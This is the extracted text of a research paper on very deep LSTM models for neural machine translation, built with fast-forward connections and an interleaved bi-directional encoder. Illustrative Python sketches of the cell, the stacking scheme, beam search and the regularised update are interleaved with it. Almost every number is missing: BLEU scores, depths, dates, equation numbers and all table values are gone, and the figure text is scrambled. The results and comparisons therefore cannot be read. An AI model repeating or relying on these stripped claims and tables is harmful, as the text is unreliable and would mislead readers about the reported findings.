relationship between the target words and the input words. recent results show that the systems based on these models can achieve sim- ilar performance to conventional smt systems (lu- ong et al., ; jean et al., ). however, a single neural model of either of the above types has not been competitive with the best conventional system (durrani et al., ) when evaluated on the wmt’ english-to-french task. the best bleu score from a single model with six layers is only . (luong et al., ) while the conventional method of (durrani et al., ) achieves . . we focus on improving the single model perfor- transactions of the association for computational linguistics, vol. , pp. – , . action editor: holger schwenk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
mance by increasing the model depth. deep topol- ogy has been proven to outperform the shallow ar- chitecture in computer vision. in the past two years the top positions of the imagenet contest have al- ways been occupied by systems with tens or even hundreds of layers (szegedy et al., ; he et al., ). but in nmt, the biggest depth used success- fully is only six (luong et al., ). we attribute this problem to the properties of the long short- term memory (lstm) (hochreiter and schmid- huber, ) which is widely used in nmt. in the lstm, there are more non-linear activations than in convolution layers. these activations significantly decrease the magnitude of the gradient in the deep topology, especially when the gradient propagates in recurrent form. there are also many efforts to increase the depth of the lstm such as the work by kalchbrenner et al. ( ), where the shortcuts do not avoid the nonlinear and recurrent computation. in this work, we introduce a new type of lin- ear connections for multi-layer recurrent networks. these connections, which are called fast-forward connections, play an essential role in building a deep topology with depth of . in addition, we in- troduce an interleaved bi-directional architecture to stack lstm layers in the encoder. this topology can be used for both the encoder-decoder network and the attention network. on the wmt’ english- to-french task, this is the deepest nmt topology that has ever been investigated. with our deep at- tention model, the bleu score can be improved to . outperforming the shallow model which has six layers (luong et al., ) by . bleu points. this is also the first time on this task that a single nmt model achieves state-of-the-art performance and outperforms the best conventional smt sys- tem (durrani et al., ) with an improvement of . . even without using the attention mechanism, we can still achieve . with a single model. after model ensembling and unknown word processing, the bleu score can be further improved to . . when evaluated on the subset of the test corpus without unknown words, our model achieves . . as a reference, previous work showed that oracle re- scoring of the -best sequences generated by the smt model can achieve the bleu score of about (sutskever et al., ). our models are also validated on the more difficult wmt’ english-to- german task. neural machine translation neural machine translation aims at generating the target word sequence y = {y , . . . ,yn} given the source word sequence x = {x , . . . ,xm} with neu- ral models. in this task, the likelihood p(y | x,θ) of the target sequence will be maximized (forcada and ñeco, ) with parameter θ to learn: p(y | x;θ) = m+ ∏ j= p(yj | y :j− ,x;θ) ( ) where y :j− is the sub sequence from y to yj− . y and ym+ denote the start mark and end mark of target sequence respectively. the process can be explicitly split into an encod- ing part, a decoding part and the interface between these two parts. in the encoding part, the source se- quence is processed and transformed into a group of vectors e = {e , · · · ,em} for each time step. fur- ther operations will be used at the interface part to extract the final representation c of the source se- quence from e. at the decoding step, the target se- quence is generated from the representation c. recently, there have been two types of nmt mod- els which are different in the interface part. in the encoder-decoder model (sutskever et al., ), a single vector extracted from e is used as the rep- resentation. 
in the attention model (bahdanau et al., ), c is dynamically obtained according to the relationship between the target sequence and the source sequence. the recurrent neural network (rnn), or its spe- cific form the lstm, is generally used as the basic unit of the encoding and decoding part. however, the topology of most of the existing models is shal- low. in the attention network, the encoding part and the decoding part have only one lstm layer respec- tively. in the encoder-decoder network, researchers have used at most six lstm layers (luong et al., ). because machine translation is a difficult problem, we believe more complex encoding and decoding architecture is needed for modeling the re- lationship between the source sequence and the tar- get sequence. in this work, we focus on enhancing the complexity of the encoding/decoding architec- ture by increasing the model depth. deep neural models have been studied in a wide range of problems. in computer vision, models with more than ten convolution layers outperform shallow ones on a series of image tasks in recent years (srivastava et al., ; he et al., ; szegedy et al., ). different kinds of shortcut connections are proposed to decrease the length of the gradient propagation path. training networks based on lstm layers, which are widely used in language problems, is a much more challenging task. because of the existence of many more nonlin- ear activations and the recurrent computation, gradi- ent values are not stable and are generally smaller. following the same spirit for convolutional net- works, a lot of effort has also been spent on training deep lstm networks. yao et al. ( ) introduced depth-gated shortcuts, connecting lstm cells at ad- jacent layers, to provide a fast way to propagate the gradients. they validated the modification of these shortcuts on an mt task and a language modeling task. however, the best score was obtained using models with three layers. similarly, kalchbrenner et al. ( ) proposed a two dimensional structure for the lstm. their structure decreases the number of nonlinear activations and path length. however, the gradient propagation still relies on the recurrent computation. the investigations were also made on question-answering to encode the questions, where at most two lstm layers were stacked (hermann et al., ). based on the above considerations, we propose new connections to facilitate gradient propagation in the following section. deep topology we build the deep lstm network with the new pro- posed linear connections. the shortest paths through the proposed connections do not include any non- linear transformations and do not rely on any recur- rent computation. we call these connections fast- forward connections. within the deep topology, we also introduce an interleaved bi-directional architec- ture to stack the lstm layers. . network our entire deep neural network is shown in fig. . this topology can be divided into three parts: the encoder part (p-e) on the left, the decoder part (p- d) on the right and the interface between these two parts (p-i) which extracts the representation of the source sequence. we have two instantiations of this topology: deep-ed and deep-att, which corre- spond to the extension of the encoder-decoder net- work and the attention network respectively. our main innovation is the novel scheme for connecting adjacent recurrent layers. we will start with the ba- sic rnn model for the sake of clarity. recurrent layer: when an input sequence {x , . . . 
,xm} is given to a recurrent layer, the out- put ht at each time step t can be computed as (see fig. (a)) ht = σ(wfxt + wrht− ) = rnn (wfxt,ht− ) = rnn (ft,ht− ), ( ) where the bias parameter is not included for simplic- ity. we use a red circle and a blue empty square to denote an input and a hidden state. a blue square with a “-” denotes the previous hidden state. a dot- ted line means that the hidden state is used recur- rently. this computation can be equivalently split into two consecutive steps: • feed-forward computation: ft = wfxt. left part in fig. (b). “f” block. • recurrent computation: rnn (ft,ht− ). right part and the sum operation (+) followed by activation in fig. (b). “r” block. for a deep topology with stacked recurrent layers, the input of each block “f” at recurrent layer k (de- noted by fk) is usually the output of block “r” at its previous recurrent layer k − (denoted by hk− ). in our work, we add fast-forward connections (f-f connections) which connect two feed-forward com- putation blocks “f” of adjacent recurrent layers. it means that each block “f” at recurrent layer k takes both the outputs of block “f” and block “r” at its pre- vious layer as input (fig. (c)). f-f connections are denoted by dashed red lines in fig. (c) and fig. . the path of f-f connections contains neither non- linear activations nor recurrent computation. it pro- vides a fast path for information to propagate, so we call this path fast-forward connections. t t t - - - - - - - -(a) (b) (c) f-f wf wr ht ht- x ht wf wr x ht- x ht- wf wf ht ht ht- f t f t f t block f block r figure : rnn models. the recurrent use of a hidden state is denoted by dotted lines. a “-” mark denotes the hidden value of the previous time step. (a): basic rnn. (b): basic rnn with intermediate computational state and the sum operation (+) followed by activation. it consists of block “f” and block “r”, and is equivalent to (a). (c):two stacked rnn layers with f-f connections denoted by dashed red lines. additionally, in order to learn more temporal dependencies, the sequences can be processed in different directions at each pair of adjacent recurrent layers. this is quantitatively expressed in eq. : fkt = w k f · [fk− t ,hk− t ], k > fkt = w k f xt k = hkt = rnn k (fkt ,h k t+(− )k) ( ) the opposite directions are marked by the direction term (− )k. at the first recurrent layer, the block “f” takes xt as the input. [ , ] denotes the concatenation of vectors. this is shown in fig. (c). the two changes are summarized here: • we add a connection between fkt and fk− t . without fk− t , our model will be reduced to the traditional stacked model. • we alternate the rnn direction at different lay- ers k with the direction term (− )k. if we fix the direction term to − , all layers work in the forward direction. lstm layer: in our experiments, instead of an rnn, a specific type of recurrent layer called lstm (hochreiter and schmidhuber, ; graves et al., ) is used. the lstm is structurally more complex than the basic rnn in eq. . we de- fine the computation of the lstm as a function which maps the input f and its state-output pair (h,s) at the previous time step to the current state- output pair. 
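Before the exact LSTM computations are written out below, the stacking scheme with fast-forward connections can be made concrete using plain RNN blocks. The following is a minimal sketch, not the authors' implementation: the tanh recurrence, toy layer sizes and variable names are assumptions. Layer 1 feeds on the word embeddings, every deeper layer feeds on the concatenation of the previous layer's feed-forward output and hidden states, and the processing direction alternates between adjacent layers.

```python
import numpy as np

def rnn_block(f_seq, W_r, reverse=False):
    """Recurrent "R" block: h_t = tanh(f_t + W_r h_{t-1}), optionally run right-to-left."""
    T, d = f_seq.shape
    h, out = np.zeros(d), np.zeros_like(f_seq)
    steps = range(T - 1, -1, -1) if reverse else range(T)
    for t in steps:
        h = np.tanh(f_seq[t] + W_r @ h)
        out[t] = h
    return out

def deep_rnn_with_ff(x_seq, n_layers, d, rng):
    """Stack of recurrent layers with fast-forward (F-F) connections.

    Layer 1 feeds on the input embeddings; every deeper layer k feeds on the
    concatenation [f^{k-1}_t, h^{k-1}_t] of the previous layer's feed-forward
    output and hidden state, and the direction alternates between layers.
    """
    f_prev = h_prev = None
    for k in range(1, n_layers + 1):
        inp = x_seq if k == 1 else np.concatenate([f_prev, h_prev], axis=-1)
        W_f = rng.standard_normal((inp.shape[-1], d)) * 0.1   # feed-forward "F" block
        W_r = rng.standard_normal((d, d)) * 0.1
        f_cur = inp @ W_f
        h_cur = rnn_block(f_cur, W_r, reverse=(k % 2 == 0))   # alternating direction term
        f_prev, h_prev = f_cur, h_cur
    return f_prev, h_prev

rng = np.random.default_rng(0)
x = rng.standard_normal((7, 16))                 # toy sequence: 7 steps, 16-dim embeddings
f_top, h_top = deep_rnn_with_ff(x, n_layers=4, d=32, rng=rng)
print(f_top.shape, h_top.shape)                  # (7, 32) (7, 32)
```

The shortest path from the top layer down to the input passes only through concatenations and linear maps, which is exactly the property the fast-forward connections are meant to provide.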
the exact computations for (ht,st) = lstm(ft,ht− ,st− ) are the following: [z,zρ,zφ,zπ] = ft + wrht− st = σi(z)◦σg(zρ + st− ◦θρ) + σg(zφ + st− ◦θφ)◦st− ht = σo(st)◦σg(zπ + st ◦θπ) ( ) where [z,zρ,zφ,zπ] is the concatenation of four vec- tors of equal size, ◦ means element-wise multiplica- tion, σi is the input activation function, σo is the out- put activation function, σg is the activation function for gates, and wr, θρ, θφ, and θπ are the parame- ters of the lstm. it is slightly different from the standard notation in that we do not have a matrix to multiply with the input f in our notation. with this notation, we can write down the com- putations for our deep bi-directional lstm model with f-f connections: fkt = w k f · [fk− t ,hk− t ], k > fkt = w k f xt, k = (hkt ,s k t ) = lstm k ( fkt ,h k t+(− )k,s k t+(− )k ) ( ) where xt is the input to the deep bi-directional lstm model. for the encoder, xt is the embedding of the tth word in the source sentence. for the de- coder xt is the concatenation of the embedding of the tth word in the target sentence and the encoder representation for step t. in our final model two additional operations are used with eq. , which is shown in eq. . half(f) denotes the first half of the elements of f, and dr(h) is the dropout operation (hinton et al., ) which randomly sets an element of h to zero with a cer- tain probability. the use of half(·) is to reduce the parameter size and does not affect the perfor- mance. we observed noticeable performance degra- dation when using only the first third of the elements of “f”. fkt = w k f · [half(fk− t ),dr(hk− t )], k > ( ) with the f-f connections, we build a fast channel to propagate the gradients in the deep topology. f-f connections can accelerate the model convergence and while improving the performance. a similar idea was also used in (he et al., ; zhou and xu, ). encoder: the lstm layers are stacked following eq. . we call this type of encoder interleaved bi- directional encoder. in addition, there are two sim- ilar columns (a and a ) in the encoder part. each column consists of ne stacked lstm layers. there is no connection between the two columns. the first layers of the two columns process the word repre- sentations of the source sequence in different direc- tions. at the last lstm layers, there are two groups of vectors representing the source sequence. the group size is the same as the length of the input se- quence. interface: prior encoder-decoder models and atten- tion models are different in their method of extract- ing the representations of the source sequences. in our work, as a consequence of the introduced f-f connections, we have output vectors (hnet and f ne t of both columns). the representations are modified for both deep-ed and deep-att. for deep-ed, et is static and consists of four parts. : the last time step output hnem of the first column. : max-operation max(·) of hnet at all time steps of the second column, denoted by max(hne,a t ). max(·) denotes obtaining the maximal value for each dimension over t. : max(f ne,a t ). : max(f ne,a t ). the max-operation and last time step state extraction provide compli- mentary information but do not affect the perfor- mance much. et is used as the final representation ct. for deep-att, we do not need the above two op- erations. we only concatenate the output vectors at each time step to obtain et, and a soft attention mechanism (bahdanau et al., ) is used to calcu- late the final representation ct from et. 
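Before the encoder outputs are summarized, the LSTM step defined above can be made concrete. The sketch below mirrors the stated computation for (h_t, s_t) = LSTM(f_t, h_{t-1}, s_{t-1}), using the sigmoid/tanh choices reported later in the model settings; it is only an illustration, and the toy dimensions and variable names are assumptions, not the authors' code. As in the text, the input f_t is already the output of the feed-forward block, so there is no separate input weight matrix inside the cell.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def lstm_step(f_t, h_prev, s_prev, W_r, theta_rho, theta_phi, theta_pi):
    """One step of the LSTM variant used here.

    [z, z_rho, z_phi, z_pi] = f_t + W_r h_{t-1}
    s_t = sigma_i(z) * sigma_g(z_rho + s_{t-1} * theta_rho)
          + sigma_g(z_phi + s_{t-1} * theta_phi) * s_{t-1}
    h_t = sigma_o(s_t) * sigma_g(z_pi + s_t * theta_pi)
    with sigma_g = sigmoid (gates) and sigma_i = sigma_o = tanh (input / output).
    """
    pre = f_t + W_r @ h_prev                   # shape (4d,)
    z, z_rho, z_phi, z_pi = np.split(pre, 4)
    s_t = (np.tanh(z) * sigmoid(z_rho + s_prev * theta_rho)
           + sigmoid(z_phi + s_prev * theta_phi) * s_prev)
    h_t = np.tanh(s_t) * sigmoid(z_pi + s_t * theta_pi)
    return h_t, s_t

rng = np.random.default_rng(0)
d = 8                                          # toy cell size (an assumption)
W_r = rng.standard_normal((4 * d, d)) * 0.1
theta_rho, theta_phi, theta_pi = rng.standard_normal((3, d)) * 0.1
h, s = np.zeros(d), np.zeros(d)
for _ in range(5):                             # a few toy time steps
    f_t = rng.standard_normal(4 * d)           # output of the feed-forward block
    h, s = lstm_step(f_t, h, s, W_r, theta_rho, theta_phi, theta_pi)
print(h.shape, s.shape)                        # (8,) (8,)
```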
et is summa- rized as: deep-ed: et [hne,a m ,max(h ne,a t ),max(f ne,a t ),max(f ne,a t )] deep-att: et [h ne,a t ,h ne,a t ,f ne,a t ,f ne,a t ] ( ) note that the vector dimensionality of f is four times larger than that of h (see eq. ). ct is summarized as: deep-ed: ct = et, (const) deep-att: ct = m∑ t′= αt,t′wpet′ ( ) αt,t′ is the normalized attention weight computed by: αt,t′ = exp(a(wpet′,h ,dec t− ))∑ t′′ exp(a(wpet′′,h ,dec t− )) ( ) h ,dec t− is the first hidden layer output in the decoding part. a(·) is an alignment model described in (bah- danau et al., ). for deep-att, in order to re- duce the memory cost, we linearly project (with wp) the concatenated vector et to a vector with / di- mension size, denoted by the (fully connected) block “fc” in fig. . decoder: the decoder follows eq. and eq. with fixed direction term − . at the first layer, we use the following xt: xt = [ct,yt− ] ( ) yt− is the target word embedding at the previous time step and y is zero. there is a single column of nd stacked lstm layers. we also use the f-f connections like those in the encoder and all layers are in the forward direction. note that at the last lstm layer, we only use ht to make the prediction with a softmax layer. although the network is deep, the training tech- nique is straightforward. we will describe this in the next part. . training technique we take the parallel data as the only input without using any monolingual data for either word repre- sentation pre-training or language modeling. be- cause of the deep bi-directional structure, we do not need to reverse the sequence order as sutskever et al. ( ). the deep topology brings difficulties for the model training, especially when first order methods such as stochastic gradient descent (sgd) (lecun et al., ) are used. the parameters should be properly initialized and the converging process can + i it . r r r r it .i r r r r r r r r r r r r … … … … … k = .. . en co di ng ve ct or s je . r r r … … … … … … predicted w ords e  e  e  e  e  e  e  e  e  e  e  e  e  e  e  e  d d d i i a   ia <s> r d fc enjoy enjoy l'app- récie ff ff ff ff ff ff ff ff f f ff encoder interface decoder ie  ie  r f- f co nn ec tio n f- f co nn ec tio n f- f co nn ec tio n c c c c ' ie k = ... k = … … … … … figure : the network. it includes three parts from left to right: encoder part (p-e), interface (p-i) and decoder part (p-d). we only show the topology of deep-att as an example. “f” and “r” blocks correspond to the feed-forward part and the subsequent lstm computation. the f-f connections are denoted by dashed red lines. be slow. we tried several optimization techniques such as adadelta (zeiler, ), rmsprop (tiele- man and hinton, ) and adam (kingma and ba, ). we found that all of them were able to speed up the process a lot compared to simple sgd while no significant performance difference was ob- served among them. in this work, we chose adam for model training and do not present a detailed com- parison with other optimization methods. dropout (hinton et al., ) is also used to avoid over-fitting. it is utilized on the lstm nodes hkt (see eq. ) with a ratio of pd for both the encoder and decoder. during the whole model training process, we keep all hyper parameters fixed without any intermediate interruption. the hyper parameters are selected ac- cording to the performance on the development set. for such a deep and large network, it is not easy to determine the tuning strategy and this will be con- sidered in future work. . 
generation we use the common left-to-right beam-search method for sequence generation. at each time step t, the word yt can be predicted by: ŷt = arg max y p(y|ŷ :t− ,x;θ) ( ) where ŷt is the predicted target word. ŷ :t− is the generated sequence from time step to t − . we keep nb best candidates according to eq. at each time step, until the end of sentence mark is gener- ated. the hypotheses are ranked by the total like- lihood of the generated sequence, although normal- ized likelihood is used in some works (jean et al., ). experiments we evaluate our method mainly on the widely used wmt’ english-to-french translation task. in or- der to validate our model on more difficult lan- guage pairs, we also provide results on the wmt’ english-to-german translation task. our models are implemented in the paddle (parallel distributed deep learning) platform. . data sets for both tasks, we use the full wmt’ parallel cor- pus as our training data. the detailed data sets are listed below: • english-to-french: europarl v , common crawl, un, news commentary, gigaword • english-to-german: europarl v , common crawl, news commentary in total, the english-to-french corpus includes million sentence pairs, and the english-to-german corpus includes . million sentence pairs. the news-test- and news-test- are concate- nated as our development set, and the news-test- is the test set. our data partition is consistent with previous works on nmt (luong et al., ; jean et al., ) to ensure fair comparison. for the source language, we select the most fre- quent k words as the input vocabulary. for the target language we select the most frequent k french words and the most frequent k german words as the output vocabulary. the full vocab- ulary of the german corpus is larger (jean et al., ), so we select more german words to build the target vocabulary. out-of-vocabulary words are re- placed with the unknown symbol 〈unk〉. for com- plete comparison to previous work on the english- to-french task, we also show the results with a smaller vocabulary of k input words and k out- put words on the sub train set with selected m par- allel sequences (schwenk, ; sutskever et al., ; cho et al., ). . model settings we have two models as described above, named deep-ed and deep-att. both models have exactly the same configuration and layer size except the in- terface part p-i. we use dimensional word embeddings for both the source and target languages. all lstm layers, including the ×ne layers in the encoder and the nd layers in the decoder, have memory cells. the output layer size is the same as the size of the target vocabulary. the dimension of ct is and for deep-ed and deep-att respectively. for each lstm layer, the activation functions for gates, inputs and outputs are sigmoid, tanh, and tanh re- spectively. our network is narrow on word embeddings and lstm layers. note that in previous work (sutskever et al., ; bahdanau et al., ), dimensional word embeddings and di- mensional lstm layers are used. we also tried larger scale models but did not obtain further im- provements. . optimization note that each lstm layer includes two parts as described in eq. , feed-forward computation and recurrent computation. since there are non-linear activations in the recurrent computation, a larger learning rate lr = × − is used, while for the feed-forward computation a smaller learning rate lf = × − is used. word embeddings and the softmax layer also use this learning rate lf . 
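Referring back to the left-to-right beam search described in the Generation subsection above, the sketch below shows only the bookkeeping: keep the best partial hypotheses at each step and rank finished ones by total log-likelihood. The stand-in scoring function, the token ids and the end-of-sentence id are placeholders rather than the actual decoder.

```python
import math

def beam_search(step_logprobs, beam_size, eos_id, max_len):
    """Left-to-right beam search over a toy scoring function.

    step_logprobs(prefix) -> {token_id: log p(token | prefix, x)} stands in for
    the decoder; hypotheses are ranked by total (unnormalised) log-likelihood.
    """
    beams = [([], 0.0)]                      # (token sequence, total log-prob)
    finished = []
    for _ in range(max_len):
        candidates = []
        for seq, score in beams:
            for tok, lp in step_logprobs(seq).items():
                candidates.append((seq + [tok], score + lp))
        candidates.sort(key=lambda c: c[1], reverse=True)
        beams = []
        for seq, score in candidates[:beam_size]:
            (finished if seq[-1] == eos_id else beams).append((seq, score))
        if not beams:                        # every surviving hypothesis has ended
            break
    finished.extend(beams)                   # fall back to unfinished hypotheses
    return max(finished, key=lambda c: c[1])

def toy_decoder(prefix):                     # placeholder: prefers token 1, then <eos> (id 0)
    if len(prefix) < 3:
        return {1: math.log(0.6), 2: math.log(0.3), 0: math.log(0.1)}
    return {0: math.log(0.9), 1: math.log(0.1)}

print(beam_search(toy_decoder, beam_size=2, eos_id=0, max_len=10))
```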
we refer all the parameters not used for recurrent computa- tion as non-recurrent part of the model. because of the large model size, we use strong l regularization to constrain the parameter matrix v in the following way: v ← v − l · (g + r ·v) ( ) here r is the regularization strength, l is the corre- sponding learning rate, g stands for the gradients of v. the two embedding layers are not regularized. all the other layers have the same r = . the parameters of the recurrent computation part are initialized to zero. all non-recurrent parts are randomly initialized with zero mean and standard deviation of . . a detailed guide for setting hyper- parameters can be found in (bengio, ). the dropout ratio pd is . . in each batch, there are ∼ sequences in our work. the exact number depends on the sequence lengths and model size. we also find that larger batch size results in better convergence although the improvement is not large. however, the largest batch size is constrained by the gpu memory. we use ∼ gpu machines (each has k gpu cards) running for days to train the full model with parallelization at the data batch level. it takes nearly . days for each pass. one thing we want to emphasize here is that our deep model is not sensitive to these settings. small variation does not affect the final performance. . results we evaluate the same way as previous nmt works (sutskever et al., ; luong et al., ; jean et al., ). all reported bleu scores are computed with the multi-bleu.perl script which is also used in the above works. the results are for tokenized and case sensitive evaluation. . . single models english-to-french: first we list our single model results on the english-to-french task in tab. . in the first block we show the results with the full https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/generic/ multi-bleu.perl corpus. the previous best single nmt encoder- decoder model (enc-dec) with six layers achieves bleu= . (luong et al., ). from deep-ed, we obtain the bleu score of . , which outper- forms enc-dec model by . bleu points. this result is even better than the ensemble result of eight enc-dec models, which is . (luong et al., ). this shows that, in addition to the convolutional lay- ers for computer vision, deep topologies can also work for lstm layers. for deep-att, the perfor- mance is further improved to . . we also list the previous state-of-the-art performance from a con- ventional smt system (durrani et al., ) with the bleu of . . this is the first time that a single nmt model trained in an end-to-end form beats the best conventional system on this task. we also show the results on the smaller data set with m sentence pairs and k vocabulary in the second block. the two attention mod- els, rnnsearch (bahdanau et al., ) and rnnsearch-lv (jean et al., ), achieve bleu scores of . and . respectively. note that rnnsearch-lv uses a large output vocabulary of k words based on the standard attention model rnnsearch. we obtain bleu= . which outper- forms its corresponding shallow model rnnsearch by . bleu points. the smt result from (schwenk, ) is also listed and falls behind our model by . bleu points. methods data voc bleu enc-dec (luong, ) m k . smt (durrani, ) m full . deep-ed (ours) m k . deep-att (ours) m k . rnnsearch (bahdanau, ) m k . rnnsearch-lv (jean, ) m k . smt (schwenk, ) m full . deep-att (ours) m k . table : english-to-french task: bleu scores of single neural models. we also list the conventional smt system for comparison. 
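The regularised update and the split learning rates described in the Optimization subsection above can be sketched as follows. The paper trains with Adam; this snippet only illustrates the stated v <- v - l(g + r v) rule, the larger learning rate for the recurrent part, the smaller one for the non-recurrent part, and the exemption of the embedding layers from regularisation. The concrete numbers are placeholders, not the paper's settings.

```python
import numpy as np

def regularized_step(param, grad, lr, reg, regularize=True):
    """v <- v - l * (g + r * v): one L2-regularised gradient step."""
    if not regularize:                          # e.g. the two embedding layers
        return param - lr * grad
    return param - lr * (grad + reg * param)

# Placeholder hyper-parameters: the recurrent part gets a larger learning rate
# than the non-recurrent part (feed-forward blocks, embeddings, softmax).
LR_RECURRENT, LR_NON_RECURRENT, REG = 2e-3, 2e-4, 1e-5

rng = np.random.default_rng(0)
W_r = np.zeros((8, 8))                          # recurrent weights start at zero
W_f = rng.standard_normal((8, 16)) * 0.01       # non-recurrent weights: small random init
E = rng.standard_normal((100, 16)) * 0.01       # embedding table (not regularised)

gW_r, gW_f, gE = (rng.standard_normal(m.shape) for m in (W_r, W_f, E))
W_r = regularized_step(W_r, gW_r, LR_RECURRENT, REG)
W_f = regularized_step(W_f, gW_f, LR_NON_RECURRENT, REG)
E = regularized_step(E, gE, LR_NON_RECURRENT, REG, regularize=False)
```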
moreover, during the generation process, we ob- tained the best bleu score with beam size = (when the beam size is , there is only a . dif- ference in bleu score). this is different from other works listed in tab. , where the beam size is (jean et al., ; sutskever et al., ). we at- tribute this difference to the improved model per- formance, where the ground truth generally exists in the top hypothesis. consequently, with the much smaller beam size, the generation efficiency is sig- nificantly improved. next we list the effect of the novel f-f connec- tions in our deep-att model of shallow topology in tab. . when ne = and nd = , the bleu scores are . without f-f and . with f-f. note that the model without f-f is exactly the standard attention model (bahdanau et al., ). since there is only a single layer, the use of f-f connections means that at the interface part we include ft into the represen- tation (see eq. ). we find f-f connections bring an improvement of . in bleu. after we increase our model depth to ne = and nd = , the improve- ment is enlarged to . . when the model is trained with larger depth without f-f connections, we find that the parameter exploding problem (bengio et al., ) happens so frequently that we could not finish training. this suggests that f-f connections provide a fast way for gradient propagation. models f-f ne nd bleu deep-att no . deep-att yes . deep-att no . deep-att yes . table : the effect of f-f. we list the bleu scores of deep-att with and without f-f. because of the param- eter exploding problem, we can not list the model per- formance of larger depth without f-f. for ne = and nd = , f-f connections only contribute to the represen- tation at interface part (see eq. ). removing f-f connections also reduces the cor- responding model size. in order to figure out the effect of f-f comparing models with the same pa- rameter size, we increase the lstm layer width of deep-att without f-f. in tab. we show that, after using a two times larger lstm layer width of , we can only obtain a bleu score of . , which is still worse than the corresponding deep-att with f-f. we also notice that the interleaved bi-directional encoder starts to work when the encoder depth is larger than . the effect of the interleaved bi- directional encoder is shown in tab. . for our largest model with ne = and nd = , we compared models f-f ne nd width bleu deep-att no . deep-att no . deep-att yes . table : bleu scores with different lstm layer width in deep-att. after using two times larger lstm layer width of , we can only obtain bleu score of . . it is still behind the corresponding deep-att with f-f. the bleu scores of the interleaved bi-directional encoder and the uni-directional encoder (where all lstm layers work in forward direction). we find there is a gap of about . points between these two encoders for both deep-att and deep-ed. models encoder ne nd bleu deep-att bi . deep-att uni . deep-ed bi . deep-ed uni . table : the effect of the interleaved bi-directional en- coder. we list the bleu scores of our largest deep-att and deep-ed models. the encoder term bi denotes that the interleaved bi-directional encoder is used. uni de- notes a model where all lstm layers work in forward direction. next we look into the effect of model depth. in tab. , starting from ne = and nd = and gradu- ally increasing the model depth, we significantly in- crease bleu scores. with ne = and nd = , the best score for deep-att is . . 
we tried to increase the lstm width based on this, but obtained little improvement. as we stated in sec. , the complexity of the encoder and decoder, which is related to the model depth, is more important than the model size. we also tried a larger depth, but the results started to get worse. with our topology and training tech- nique, ne = and nd = is the best depth we can achieve. the last line in tab. shows the bleu score of . of our deepest model, where only one encod- ing column (col = ) is used. we find a . bleu points degradation with a single encoding column. note that the uni-directional models in tab. with uni-direction still have two encoding columns. in order to find out whether this is caused by the de- creased parameter size, we test a wider model with models f-f ne nd col bleu deep-att yes . deep-att yes . deep-att yes . deep-att yes . deep-att yes . table : bleu score of deep-att with different model depth. with ne = and nd = , f-f connections only contribute to the representation at interface part where ft is included (see eq. ). memory blocks for the lstm layers. it is shown in tab. that there is a minor improvement of only . . we attribute this to the complementary in- formation provided by the double encoding column. models f-f ne nd col width bleu deep-att yes . deep-att yes . deep-att yes . table : comparison of encoders with different number of columns and lstm layer width. english-to-german: we also validate our deep topology on the english-to-german task. the english-to-german task is considered a relatively more difficult task, because of the lower similarity between these two languages. since the german vo- cabulary is much larger than the french vocabulary, we select k most frequent words as the target vo- cabulary. all the other hyper parameters are exactly the same as those in the english-to-french task. we list our single model deep-att performance in tab. . our single model result with bleu= . is similar to the conventional smt result of . (buck et al., ). we also outperform the shallow at- tention models as shown in the first two lines in tab. . all the results are consistent with those in the english-to-french task. . . post processing two post processing techniques are used to im- prove the performance further on the english-to- french task. first, three deep-att models are built for ensem- ble results. they are initialized with different ran- dom parameters; in addition, the training corpus methods data voc bleu rnnsearch (jean, ) . m k . rnnsearch-lv (jean, ) . m k . smt (buck, ) . m full . deep-att (ours) . m k . table : english-to-german task: bleu scores of single neural models. we also list the conventional smt system for comparison. for these models is shuffled with different random seeds. we sum over the predicted probabilities of the target words and normalize the final distribution to generate the next word. it is shown in tab. that the model ensemble can improve the performance further to . . in luong et al. ( ) and jean et al. ( ) there are eight models for the best scores, but we only use three models and we do not obtain further gain from more models. methods model data voc bleu deep-ed single m k . deep-att single m k . deep-att single+posunk m k . deep-att ensemble m k . deep-att ensemble+posunk m k . smt durrani, m full . enc-dec ensemble+posunk m k . table : bleu scores of different models. the first two blocks are our results of two single models and mod- els with post processing. 
in the last block we list two baselines of the best conventional smt system and nmt system. second, we recover the unknown words in the generated sequences with the positional unknown (posunk) model introduced in (luong et al., ). the full parallel corpus is used to obtain the word mappings (liang et al., ). we find this method provides an additional . bleu points, which is consistent with the conclusion in luong et al. ( ). we obtain the new bleu score of . with a single deep-att model. for the ensemble models of deep-att, the bleu score rises to . . in the last two lines, we list the conventional smt model (durrani et al., ) and the previous best neural models based system enc-dec (luong et al., ) for comparison. we find our best score outperforms the previous best score by nearly points. . analysis . . length on the english-to-french task, we analyze the effect of the source sentence length on our mod- els as shown in fig. . here we show five curves: our deep-att single model, our deep-att ensemble model, our deep-ed model, a previously proposed enc-dec model with four layers (sutskever et al., ) and an smt model (durrani et al., ). we find our deep-att model works better than the sentences by length b l e u deep−att single model deep−att ensemble models deep−ed single model enc−dec layers (sutskever, ) smt (durrani, ) figure : bleu scores vs. source sequence length. five lines are our deep-att single model, deep-att ensem- ble model, our deep-ed model, previous enc-dec model with four layers and smt model. previous two models (enc-dec and smt) on nearly all sentence lengths. it is also shown that for very long sequences with length over words, the per- formance of our deep-att does not degrade, when compared to another nmt model enc-dec. our deep-ed also has much better performance than the shallow enc-dec model on nearly all lengths, al- though for long sequences it degrades and starts to fall behind deep-att. . . unknown words next we look into the detail of the effect of un- known words on the english-to-french task. we select the subset without unknown words on target sentences from the original test set. there are such sentences ( . %). we compute the bleu scores on this subset and the results are shown in tab. . we also list the results from smt model (durrani et al., ) as a comparison. we find that the bleu score of deep-att on this subset rises to . , which has a gap of . with model test set ratio(%) bleu deep-att full . . ensemble full . . smt(durrani) full . . deep-att subset . . ensemble subset . . smt(durrani) subset . . table : bleu scores of the subset of the test set without considering unknown words. . . . . . . . . . . . te st t r a i n n e = n d = n e = n d = n e = n d = figure : token error rate on train set vs. test set. square: deep-att (ne = , nd = ). circle: deep-att (ne = , nd = ). triagle: deep-att (ne = , nd = ). the score . on the full test set. on this sub- set, the smt model achieves . , which is simi- lar to its score . on the full test set. this sug- gests that the difficulty on this subset is not much different from that on the full set. we therefore at- tribute the larger gap for deep-att to the existence of unknown words. we also compute the bleu score on the subset of the ensemble model and ob- tain . . as a reference related to human perfor- mance, in sutskever et al. ( ), it has been tested that the bleu score of oracle re-scoring the lium -best results (schwenk, ) is . . . 
